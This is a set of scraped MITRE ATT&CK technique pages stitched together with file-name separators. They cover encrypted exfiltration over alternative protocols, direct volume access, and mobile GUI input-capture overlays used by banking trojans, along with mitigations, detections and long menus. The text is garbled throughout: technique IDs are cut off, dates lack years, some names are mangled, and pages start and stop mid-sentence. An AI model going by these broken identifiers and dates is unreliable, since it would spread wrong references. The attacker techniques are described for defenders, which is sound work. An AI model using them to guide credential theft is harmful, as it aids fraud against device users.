Application Layer Protocol Impact Carrier Billing Fraud Clipboard Modification Data Encrypted for Impact Delete Device Data Device Lockout Generate Fraudulent Advertising Revenue Input Injection Manipulate App Store Rankings or Ratings Modify System Partition SMS Control Network Effects Downgrade to Insecure Protocols Eavesdrop on Insecure Network Communication Exploit SS7 to Redirect Phone Calls/SMS Exploit SS7 to Track Device Location Jamming or Denial of Service Manipulate Device Communication Rogue Cellular Base Station Rogue Wi-Fi Access Points SIM Card Swap Remote Service Effects Obtain Device Cloud Backups Remotely Track Device Without Authorization Remotely Wipe Data Without Authorization - Home - Techniques - Enterprise - Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Other sub-techniques of Exfiltration Over Alternative Protocol (3) ID Name T1048. Exfiltration Over Symmetric Encrypted Non-C2 Protocol T1048. Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048. Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. ID: T1048. Sub-technique of: T ⓘ Tactic: Exfiltration ⓘ Platforms: Linux, Windows, macOS ⓘ Data Sources: Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow Requires Network: Yes Version: 1. Created: 15 March Last Modified: 28 March Version Permalink Live Version Procedure Examples ID Name Description G APT APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.[1] Mitigations ID Mitigation Description M Filter Network Traffic Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. M Network Intrusion Prevention Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. M Network Segmentation Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.[2] Detection Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.[3] References - Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. - Microsoft. (2004, February 6). Perimeter Firewall Design. Retrieved April 25, 2016. - Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. × load more results
versions_v9_techniques_T1048_002.txt
Campaign. Retrieved April 11, 2018. - Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018. - Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019. - Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020. - Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021. - Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021. - Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021. - F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018. - Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018. - Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018. - McAfee. (2015, March 2). Netwire RAT Behind Recent Targeted Attacks. Retrieved February 15, 2018. - Lambert, T. (2020, January 29). Intro to Netwire. Retrieved January 7, 2021. - Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021. - Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019. - Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019. - Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018. - Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021. - Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018. - Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020. - Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016. - Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. - Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016. - Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018. - Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015. - Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. - Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020. - Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018. - Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. - Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020. - Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. - PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. - PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018. - Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019. - Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016. - Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020. - Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. - Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018. - Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019. - Nicolas Verdier. (n.d.). Retrieved January 29, 2018. - Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. Retrieved January 22, 2016. - Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021. - CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021. - Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021. - Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021. - Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021. - Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021. - Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017. - Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018. - Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018. - Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019. - Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019. - Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020. - Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020. - Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018. - Ray, V., Hayashi, K. (2016, February 29). New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016. - Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017. - Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020. - Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020. - Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021. - Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016. - Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020. - Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020. - Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016. - Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018. - Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019. - Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020. - Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020. - Rewterz. (2020, April 20). Sidewinder APT Group Campaign Analysis. Retrieved January 29, 2021. - Rewterz. (2020, June 22). Analysis on Sidewinder APT Group – COVID-19. Retrieved January 29, 2021. - Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021. - Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020. - Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022. - Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018. - FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021. - FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. - Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019. - Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014. - Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021. - Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014. - USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021. - AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021. - Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018. - Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021. - Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - Boutin, J. (2020, October 12). ESET takes part in global operation to disrupt Trickbot. Retrieved March 15, 2021. - Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020. - Moore, S. et al. (2020, April 30). Anomali
versions_v11_techniques_T1547_001.txt
Metadata API Group Policy Preferences Discovery Account Discovery Local Account Domain Account Email Account Cloud Account Application Window Discovery Browser Bookmark Discovery Cloud Infrastructure Discovery Cloud Service Dashboard Cloud Service Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Domain Groups Cloud Groups Local Groups Process Discovery Query Registry Remote System Discovery Software Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion System Checks User Activity Based Checks Time Based Evasion Lateral Movement Exploitation of Remote Services Internal Spearphishing Lateral Tool Transfer Remote Service Session Hijacking SSH Hijacking RDP Hijacking Remote Services Remote Desktop Protocol SMB/Windows Admin Shares Distributed Component Object Model SSH VNC Windows Remote Management Replication Through Removable Media Software Deployment Tools Taint Shared Content Use Alternate Authentication Material Pass the Hash Pass the Ticket Application Access Token Web Session Cookie Collection Archive Collected Data Archive via Utility Archive via Library Archive via Custom Method Audio Capture Automated Collection Clipboard Data Data from Cloud Storage Object Data from Configuration Repository SNMP (MIB Dump) Network Device Configuration Dump Data from Information Repositories Confluence Sharepoint Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Local Data Staging Remote Data Staging Email Collection Local Email Collection Remote Email Collection Email Forwarding Rule Input Capture Keylogging GUI Input Capture Web Portal Capture Credential API Hooking Man in the Browser Man-in-the-Middle LLMNR/NBT-NS Poisoning and SMB Relay ARP Cache Poisoning Screen Capture Video Capture Command and Control Application Layer Protocol Web Protocols File Transfer Protocols Mail Protocols DNS Communication Through Removable Media Data Encoding Standard Encoding Non-Standard Encoding Data Obfuscation Junk Data Steganography Protocol Impersonation Dynamic Resolution Domain Generation Algorithms Fast Flux DNS DNS Calculation Encrypted Channel Symmetric Cryptography Asymmetric Cryptography Fallback Channels Ingress Tool Transfer Multi-Stage Channels Non-Application Layer Protocol Non-Standard Port Protocol Tunneling Proxy Internal Proxy External Proxy Multi-hop Proxy Domain Fronting Remote Access Software Traffic Signaling Port Knocking Web Service Dead Drop Resolver Bidirectional Communication One-Way Communication Exfiltration Automated Exfiltration Traffic Duplication Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Symmetric Encrypted Non-C2 Protocol Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration Over C2 Channel Exfiltration Over Other Network Medium Exfiltration Over Bluetooth Exfiltration Over Physical Medium Exfiltration over USB Exfiltration Over Web Service Exfiltration to Code Repository Exfiltration to Cloud Storage Scheduled Transfer Transfer Data to Cloud Account Impact Account Access Removal Data Destruction Data Encrypted for Impact Data Manipulation Stored Data Manipulation Transmitted Data Manipulation Runtime Data Manipulation Defacement Internal Defacement External Defacement Disk Wipe Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service OS Exhaustion Flood Service Exhaustion Flood Application Exhaustion Flood Application or System Exploitation Firmware Corruption Inhibit System Recovery Network Denial of Service Direct Network Flood Reflection Amplification Resource Hijacking Service Stop System Shutdown/Reboot Mobile Initial Access Deliver Malicious App via Authorized App Store Deliver Malicious App via Other Means Drive-by Compromise Exploit via Charging Station or PC Exploit via Radio Interfaces Install Insecure or Malicious Configuration Lockscreen Bypass Masquerade as Legitimate Application Supply Chain Compromise Execution Broadcast Receivers Native Code Persistence Abuse Device Administrator Access to Prevent Removal Broadcast Receivers Code Injection Compromise Application Executable Foreground Persistence Modify Cached Executable Code Modify OS Kernel or Boot Partition Modify System Partition Modify Trusted Execution Environment Privilege Escalation Code Injection Exploit OS Vulnerability Exploit TEE Vulnerability Defense Evasion Application Discovery Code Injection Delete Device Data Device Lockout Disguise Root/Jailbreak Indicators Download New Code at Runtime Evade Analysis Environment Geofencing Input Injection Install Insecure or Malicious Configuration Masquerade as Legitimate Application Modify OS Kernel or Boot Partition Modify System Partition Modify Trusted Execution Environment Native Code Obfuscated Files or Information Suppress Application Icon Uninstall Malicious Application Credential Access Access Notifications Access Sensitive Data in Device Logs Access Stored Application Data Capture Clipboard Data Capture SMS Messages Exploit TEE Vulnerability Input Capture Input Prompt Keychain Network Traffic Capture or Redirection URI Hijacking Discovery Application Discovery Evade Analysis Environment File and Directory Discovery Location Tracking Network Service Scanning Process Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery Lateral Movement Attack PC via USB Connection Exploit Enterprise Resources Collection Access Calendar Entries Access Call Log Access Contact List Access Notifications Access Sensitive Data in Device Logs Access Stored Application Data Capture Audio Capture Camera Capture Clipboard Data Capture SMS Messages Data from Local System Foreground Persistence Input Capture Location Tracking Network Information Discovery Network Traffic Capture or Redirection Screen Capture Command and Control Alternate Network Mediums Commonly Used Port Domain Generation Algorithms Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Uncommonly Used Port Web Service Exfiltration Alternate Network Mediums Commonly Used Port Data Encrypted Standard Application Layer Protocol Impact Carrier Billing Fraud Clipboard Modification Data Encrypted for Impact Delete Device Data Device Lockout Generate Fraudulent Advertising Revenue Input Injection Manipulate App Store Rankings or Ratings Modify System Partition SMS Control Network Effects Downgrade to Insecure Protocols Eavesdrop on Insecure Network Communication Exploit SS7 to Redirect Phone Calls/SMS Exploit SS7 to Track Device Location Jamming or Denial of Service Manipulate Device Communication Rogue Cellular Base Station Rogue Wi-Fi Access Points SIM Card Swap Remote Service Effects Obtain Device Cloud Backups Remotely Track Device Without Authorization Remotely Wipe Data Without Authorization - Home - Techniques - Enterprise - Direct Volume Access Direct Volume Access Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. [1] Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. [2] ID: T Sub-techniques: No sub-techniques Tactic: Defense Evasion Platforms: Windows Permissions Required: Administrator Data Sources: API monitoring Defense Bypassed: File monitoring, File system access controls Version: 2. Created: 31 May Last Modified: 30 January Version Permalink Live Version Mitigations This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Detection Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. [2] Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through PowerShell, additional logging of PowerShell scripts is recommended. References - Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014. - Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016. × load more results
versions_v8_techniques_T1006.txt
Currently viewing ATT&CK v17.1 which is the current version of ATT&CK. Learn more about the versioning system or see the live site. ATT&CKcon 6.0 is coming October 14-15 in McLean, VA and live online. To potentially join us on stage, submit to our CFP by July 9th - Home - Techniques - Mobile - Input Capture - GUI Input Capture Input Capture: GUI Input Capture Other sub-techniques of Input Capture (2) ID Name T1417. Keylogging T1417. GUI Input Capture Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.[1] There are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.[2] Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.[3] Additionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.[4] Two known approaches to displaying a prompt include: - Adversaries start a new activity on top of a running legitimate application.[1][5] Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.[6] - Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the SYSTEM_ALERT_WINDOW permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.[7][8][9] The SYSTEM_ALERT_WINDOW permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.[10] ID: T1417. Sub-technique of: T Tactic Type: Post-Adversary Device Access ⓘ Tactics: Credential Access, Collection ⓘ Platforms: Android, iOS ⓘ MTC ID: APP- Version: 1. Created: 05 April Last Modified: 17 November Version Permalink Live Version Procedure Examples ID Name Description S Anubis Anubis can create overlays to capture user credentials for targeted applications.[11] S BRATA BRATA can use tailored overlay pages to steal PINs for banking applications.[12] S Cerberus Cerberus can generate fake notifications and launch overlay attacks against attacker-specified applications.[13] S Chameleon Chameleon can perform overlay attacks against a device by injecting HTML phishing pages into a webview.[14] S Dendroid Dendroid can open a dialog box to ask the user for passwords.[15] S Drinik Drinik can use overlays to steal user banking credentials entered into legitimate sites.[16] S Escobar Escobar can collect credentials using phishing overlays.[17] S EventBot EventBot can display popups over running applications.[18] S Exobot Exobot can show phishing popups when a targeted application is running.[19] S FlixOnline FlixOnline requests overlay permissions, which can allow it to create fake Login screens for other apps.[20] S FluBot FluBot can add display overlays onto banking apps to capture credit card information.[21] S FlyTrap FlyTrap has used infected applications with Facebook login prompts to steal credentials.[22] S Ginp Ginp can use a multi-step phishing overlay to capture banking credentials and then credit card numbers after login.[23] S GPlayed GPlayed can show a phishing WebView pretending to be a Google service that collects credit card information.[24] S Gustuff Gustuff uses WebView overlays to prompt the user for their device unlock code, as well as banking and cryptocurrency application credentials. Gustuff can also send push notifications pretending to be from a bank, triggering a phishing overlay.[25][3] S Mandrake Mandrake can manipulate visual components to trick the user into granting dangerous permissions, and can use phishing overlays and JavaScript injection to capture credentials.[26] S Pallas Pallas uses phishing popups to harvest user credentials.[27] S Red Alert 2. Red Alert 2.0 has used malicious overlays to collect banking credentials.[28] S Riltok Riltok can open a fake Google Play screen requesting bank card credentials and mimic the screen of relevant mobile banking apps to request user/bank card details.[29] S Rotexy Rotexy can use phishing overlays to capture users' credit card information.[30] S S.O.V.A. S.O.V.A. can use overlays capture banking credentials and credit card information, and can open arbitrary WebViews from the C2.[31] S SharkBot SharkBot can use a WebView with a fake log in site to capture banking credentials.[32] S TangleBot TangleBot can use overlays to cover legitimate applications or screens.[33] S TERRACOTTA TERRACOTTA has displayed a form to collect user data after installation.[34] S TianySpy TianySpy can utilize WebViews to display fake authentication pages that capture user credentials.[35] S Tiktok Pro Tiktok Pro can launch a fake Facebook login page.[36] S Xbot Xbot uses phishing pages mimicking Google Play's payment interface as well as bank login pages.[37] S XcodeGhost XcodeGhost can prompt a fake alert dialog to phish user credentials.[38] Mitigations ID Mitigation Description M Enterprise Policy An EMM/MDM can use the Android DevicePolicyManager.setPermittedAccessibilityServices method to set an explicit list of applications that are allowed to use Android's accessibility features. M Use Recent OS Version The HIDE_OVERLAY_WINDOWS permission was introduced in Android 12 allowing apps to hide overlay windows of type TYPE_APPLICATION_OVERLAY drawn by other apps with the SYSTEM_ALERT_WINDOW permission, preventing other applications from creating overlay windows on top of the current application.[39] Detection ID Data Source Data Component Detects DS Application Vetting Permissions Requests Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest. DS User Interface System Settings An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). References - A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016. - Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018. - Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019. - ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019. - R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019. - Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019. - Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 12, 2024. - Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019. - Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved November 17, 2024. - Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019. - M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved September 25, 2024. - Federico Valentini, Francesco Lubatti. (2022, January 24). How BRATA is monitoring your bank account. Retrieved December 18, 2023. - Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020. - Cyble Research & Intelligence Labs. (2023, April 13). Banking Trojan targeting mobile users in Australia and Poland. Retrieved August 16, 2023. - Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016. - Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved November 17, 2024. - B. Toulas. (2022, March 12). Android malware Escobar steals your Google Authenticator MFA codes. Retrieved September 28, 2023. - D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020. - Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020. - Aviran Hazum, Bodgan Melnykov, Israel Wenik. (2021, April 7). New Wormable Android Malware Spreads by Creating Auto-Replies to Messages in WhatsApp. Retrieved January 26, 2024. - Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023. - Trend Micro. (2021, August 17). FlyTrap Android Malware Is Taking Over Facebook Accounts — Protect Yourself With a Malware Scanner. Retrieved September
versions_v17_techniques_T1417_002.txt
Currently viewing ATT&CK v12.1 which was live between October 25, 2022 and April 24, 2023. Learn more about the versioning system or see the live site. ATT&CK v12 is now live! Check out the updates here TECHNIQUES Enterprise Reconnaissance Active Scanning Scanning IP Blocks Vulnerability Scanning Wordlist Scanning Gather Victim Host Information Hardware Software Firmware Client Configurations Gather Victim Identity Information Credentials Email Addresses Employee Names Gather Victim Network Information Domain Properties DNS Network Trust Dependencies Network Topology IP Addresses Network Security Appliances Gather Victim Org Information Determine Physical Locations Business Relationships Identify Business Tempo Identify Roles Phishing for Information Spearphishing Service Spearphishing Attachment Spearphishing Link Search Closed Sources Threat Intel Vendors Purchase Technical Data Search Open Technical Databases DNS/Passive DNS WHOIS Digital Certificates CDNs Scan Databases Search Open Websites/Domains Social Media Search Engines Code Repositories Search Victim-Owned Websites Resource Development Acquire Infrastructure Domains DNS Server Virtual Private Server Server Botnet Web Services Serverless Compromise Accounts Social Media Accounts Email Accounts Cloud Accounts Compromise Infrastructure Domains DNS Server Virtual Private Server Server Botnet Web Services Serverless Develop Capabilities Malware Code Signing Certificates Digital Certificates Exploits Establish Accounts Social Media Accounts Email Accounts Cloud Accounts Obtain Capabilities Malware Tool Code Signing Certificates Digital Certificates Exploits Vulnerabilities Stage Capabilities Upload Malware Upload Tool Install Digital Certificate Drive-by Target Link Target SEO Poisoning Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Phishing Spearphishing Attachment Spearphishing Link Spearphishing via Service Replication Through Removable Media Supply Chain Compromise Compromise Software Dependencies and Development Tools Compromise Software Supply Chain Compromise Hardware Supply Chain Trusted Relationship Valid Accounts Default Accounts Domain Accounts Local Accounts Cloud Accounts Execution Command and Scripting Interpreter PowerShell AppleScript Windows Command Shell Unix Shell Visual Basic Python JavaScript Network Device CLI Container Administration Command Deploy Container Exploitation for Client Execution Inter-Process Communication Component Object Model Dynamic Data Exchange XPC Services Native API Scheduled Task/Job At Cron Launchd Scheduled Task Systemd Timers Container Orchestration Job Serverless Execution Shared Modules Software Deployment Tools System Services Launchctl Service Execution User Execution Malicious Link Malicious File Malicious Image Windows Management Instrumentation Persistence Account Manipulation Additional Cloud Credentials Additional Email Delegate Permissions Additional Cloud Roles SSH Authorized Keys Device Registration BITS Jobs Boot or Logon Autostart Execution Registry Run Keys / Startup Folder Authentication Package Time Providers Winlogon Helper DLL Security Support Provider Kernel Modules and Extensions Re-opened Applications LSASS Driver Shortcut Modification Port Monitors Print Processors XDG Autostart Entries Active Setup Login Items Boot or Logon Initialization Scripts Logon Script (Windows) Login Hook Network Logon Script RC Scripts Startup Items Browser Extensions Compromise Client Software Binary Create Account Local Account Domain Account Cloud Account Create or Modify System Process Launch Agent Systemd Service Windows Service Launch Daemon Event Triggered Execution Change Default File Association Screensaver Windows Management Instrumentation Event Subscription Unix Shell Configuration Modification Trap LC_LOAD_DYLIB Addition Netsh 